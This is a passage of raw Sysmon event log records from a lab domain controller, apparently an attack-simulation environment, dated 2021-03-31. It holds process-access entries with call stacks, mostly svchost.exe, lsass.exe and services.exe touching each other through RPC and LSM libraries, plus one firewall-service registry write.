12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.127{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.096{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001322Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.096{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001321Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.096{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001320Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.096{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001319Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.096{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.096{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.081{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.081{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.081{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.081{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.081{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.752{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646D-6064-1800-00000000AE01}2092C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.752{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646D-6064-1800-00000000AE01}2092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.565{266CAFBE-646A-6064-0A00-00000000AE01}840936C:\Windows\system32\services.exe{266CAFBE-646D-6064-1800-00000000AE01}2092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:45.518{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000615) 10341000x80000000000000001308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.502{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:45.502{266CAFBE-646C-6064-1200-00000000AE01}11961192C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 